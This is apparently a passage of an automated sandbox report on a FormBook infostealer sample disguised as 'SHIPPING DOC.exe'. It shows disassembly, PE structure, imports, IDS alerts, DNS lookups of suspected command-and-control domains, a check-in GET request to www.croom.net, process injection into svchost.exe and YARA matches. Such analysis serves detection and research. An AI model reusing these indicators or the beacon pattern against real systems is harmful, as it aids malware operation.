                                                                                                                    shr ecx, 02h
                                                                                                                    and edx, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007FC508AEE3BBh
                                                                                                                    rep movsd
                                                                                                                    jmp dword ptr [00416740h+edx*4]
                                                                                                                    mov eax, edi
                                                                                                                    mov edx, 00000003h
                                                                                                                    sub ecx, 04h
                                                                                                                    jc 00007FC508AEE39Eh
                                                                                                                    and eax, 03h
                                                                                                                    add ecx, eax
                                                                                                                    jmp dword ptr [00416654h+eax*4]
                                                                                                                    jmp dword ptr [00416750h+ecx*4]
                                                                                                                    nop
                                                                                                                    jmp dword ptr [004166D4h+ecx*4]
                                                                                                                    nop
                                                                                                                    inc cx
                                                                                                                    add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                    inc cx
                                                                                                                    add byte ptr [ebx], ah
                                                                                                                    ror dword ptr [edx-75F877FAh], 1
                                                                                                                    inc esi
                                                                                                                    add dword ptr [eax+468A0147h], ecx
                                                                                                                    add al, cl
                                                                                                                    jmp 00007FC50AF66B97h
                                                                                                                    add esi, 03h
                                                                                                                    add edi, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007FC508AEE35Eh
                                                                                                                    rep movsd
                                                                                                                    jmp dword ptr [00000000h+edx*4]
                                                                                                                    Programming Language:
                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                    • [C++] VS2010 SP1 build 40219
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    • [ASM] VS2010 SP1 build 40219
                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                    • [LNK] VS2010 SP1 build 40219
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                    RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                    RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                    RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                    RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                    RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                    RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                    RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                    RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                    RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                    RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                    RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                    RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                    RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                    RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                    RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                    RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                    RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                    RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                    USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                    GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                    OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain
                                                                                                                    EnglishUnited States
                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-11-06T08:06:18.555163+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.749732TCP
                                                                                                                    2024-11-06T08:06:58.008608+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.749954TCP
                                                                                                                    2024-11-06T08:08:11.005774+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74997150.28.1.5680TCP
                                                                                                                    2024-11-06T08:08:11.005774+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74997150.28.1.5680TCP
                                                                                                                    2024-11-06T08:08:11.005774+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.74997150.28.1.5680TCP
                                                                                                                    2024-11-06T08:10:36.345411+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.749972199.59.243.22780TCP
                                                                                                                    2024-11-06T08:10:36.345411+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.749972199.59.243.22780TCP
                                                                                                                    2024-11-06T08:10:36.345411+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.749972199.59.243.22780TCP
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 6, 2024 08:08:10.469067097 CET4997180192.168.2.750.28.1.56
                                                                                                                    Nov 6, 2024 08:08:10.475780964 CET804997150.28.1.56192.168.2.7
                                                                                                                    Nov 6, 2024 08:08:10.475850105 CET4997180192.168.2.750.28.1.56
                                                                                                                    Nov 6, 2024 08:08:10.475915909 CET4997180192.168.2.750.28.1.56
                                                                                                                    Nov 6, 2024 08:08:10.481980085 CET804997150.28.1.56192.168.2.7
                                                                                                                    Nov 6, 2024 08:08:10.965769053 CET4997180192.168.2.750.28.1.56
                                                                                                                    Nov 6, 2024 08:08:11.000989914 CET804997150.28.1.56192.168.2.7
                                                                                                                    Nov 6, 2024 08:08:11.005774021 CET4997180192.168.2.750.28.1.56
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Nov 6, 2024 08:06:47.463829994 CET4929653192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:06:47.486138105 CET53492961.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:07:09.284216881 CET5315353192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:07:09.372818947 CET53531531.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:07:28.667361021 CET6463753192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:07:28.759677887 CET53646371.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:07:49.151660919 CET6209353192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:07:49.175057888 CET53620931.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:08:09.964535952 CET6430753192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:08:10.465132952 CET53643071.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:08:30.676233053 CET6016253192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:08:30.698163033 CET53601621.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:08:51.262093067 CET6081753192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:08:51.297807932 CET53608171.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:09:12.296973944 CET6511053192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:09:12.495610952 CET53651101.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:09:32.933417082 CET5342753192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:09:32.955662966 CET53534271.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:09:53.496503115 CET5249353192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:09:53.531393051 CET53524931.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:10:15.605777025 CET5586153192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:10:15.628201008 CET53558611.1.1.1192.168.2.7
                                                                                                                    Nov 6, 2024 08:10:35.777875900 CET5415753192.168.2.71.1.1.1
                                                                                                                    Nov 6, 2024 08:10:35.818706989 CET53541571.1.1.1192.168.2.7
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Nov 6, 2024 08:06:47.463829994 CET192.168.2.71.1.1.10xaa43Standard query (0)www.onsfskfsmpfssfpewqdsawqe.xyzA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:07:09.284216881 CET192.168.2.71.1.1.10x4c9dStandard query (0)www.g18q11a.topA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:07:28.667361021 CET192.168.2.71.1.1.10x9d50Standard query (0)www.ehkd.topA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:07:49.151660919 CET192.168.2.71.1.1.10x94cdStandard query (0)www.hemicans.xyzA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:08:09.964535952 CET192.168.2.71.1.1.10x9b4aStandard query (0)www.croom.netA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:08:30.676233053 CET192.168.2.71.1.1.10x54bcStandard query (0)www.ngeribe2.homesA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:08:51.262093067 CET192.168.2.71.1.1.10xe028Standard query (0)www.epehr.picsA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:09:12.296973944 CET192.168.2.71.1.1.10xe03bStandard query (0)www.amyard.shopA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:09:32.933417082 CET192.168.2.71.1.1.10xcb9bStandard query (0)www.ivglass.xyzA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:09:53.496503115 CET192.168.2.71.1.1.10xcfeeStandard query (0)www.eries-htii.xyzA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:10:15.605777025 CET192.168.2.71.1.1.10x7458Standard query (0)www.isit-txax.xyzA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:10:35.777875900 CET192.168.2.71.1.1.10xc444Standard query (0)www.9net88.netA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Nov 6, 2024 08:06:47.486138105 CET1.1.1.1192.168.2.70xaa43Name error (3)www.onsfskfsmpfssfpewqdsawqe.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:07:09.372818947 CET1.1.1.1192.168.2.70x4c9dName error (3)www.g18q11a.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:07:28.759677887 CET1.1.1.1192.168.2.70x9d50Name error (3)www.ehkd.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:07:49.175057888 CET1.1.1.1192.168.2.70x94cdName error (3)www.hemicans.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:08:10.465132952 CET1.1.1.1192.168.2.70x9b4aNo error (0)www.croom.netcroom.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:08:10.465132952 CET1.1.1.1192.168.2.70x9b4aNo error (0)croom.net50.28.1.56A (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:08:30.698163033 CET1.1.1.1192.168.2.70x54bcName error (3)www.ngeribe2.homesnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:08:51.297807932 CET1.1.1.1192.168.2.70xe028Name error (3)www.epehr.picsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:09:12.495610952 CET1.1.1.1192.168.2.70xe03bName error (3)www.amyard.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:09:32.955662966 CET1.1.1.1192.168.2.70xcb9bName error (3)www.ivglass.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:09:53.531393051 CET1.1.1.1192.168.2.70xcfeeName error (3)www.eries-htii.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:10:15.628201008 CET1.1.1.1192.168.2.70x7458Name error (3)www.isit-txax.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:10:35.818706989 CET1.1.1.1192.168.2.70xc444No error (0)www.9net88.net94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Nov 6, 2024 08:10:35.818706989 CET1.1.1.1192.168.2.70xc444No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                    • www.croom.net
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.74997150.28.1.56804056C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 6, 2024 08:08:10.475915909 CET166OUTGET /ge07/?KzrXZd=RnhvF69Eejdjh7LW/vVnUSwJbe8jMECevaaVozv0Nv6leJNRl1tdFOKkXLktzsH0v2W+gs0fFA==&n0G=AdhDQXr HTTP/1.1
                                                                                                                    Host: www.croom.net
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:02:05:59
                                                                                                                    Start date:06/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\SHIPPING DOC.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\SHIPPING DOC.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'096'093 bytes
                                                                                                                    MD5 hash:F49A779C9194A3B100F591A333B608A6
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:02:06:00
                                                                                                                    Start date:06/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\SHIPPING DOC.exe"
                                                                                                                    Imagebase:0xcf0000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
